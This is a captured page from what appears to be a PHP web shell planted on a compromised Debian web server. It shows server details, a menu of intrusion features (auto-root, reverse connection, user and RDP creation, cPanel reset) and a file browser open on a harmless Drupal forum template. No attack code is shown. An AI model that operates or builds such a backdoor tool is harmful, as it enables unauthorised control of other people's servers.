Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 18.119.248.48
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
baltic /
web /
modules /
forum /
[ HOME SHELL ]
Name
Size
Permission
Action
forum-icon.tpl.php
691
B
-rw-r--r--
forum-list.tpl.php
3.26
KB
-rw-r--r--
forum-rtl.css
398
B
-rw-r--r--
forum-submitted.tpl.php
711
B
-rw-r--r--
forum-topic-list.tpl.php
2.44
KB
-rw-r--r--
forum.admin.inc
11.72
KB
-rw-r--r--
forum.css
1.03
KB
-rw-r--r--
forum.info
364
B
-rw-r--r--
forum.install
13.27
KB
-rw-r--r--
forum.module
47.75
KB
-rw-r--r--
forum.pages.inc
1.01
KB
-rw-r--r--
forum.test
24.98
KB
-rw-r--r--
forums.tpl.php
550
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : forums.tpl.php
<?php /** * @file * Displays a forum. * * May contain forum containers as well as forum topics. * * Available variables: * - $forums: The forums to display (as processed by forum-list.tpl.php). * - $topics: The topics to display (as processed by forum-topic-list.tpl.php). * - $forums_defined: A flag to indicate that the forums are configured. * * @see template_preprocess_forums() * * @ingroup themeable */ ?> <?php if ($forums_defined): ?> <div id="forum"> <?php print $forums; ?> <?php print $topics; ?> </div> <?php endif; ?>
Close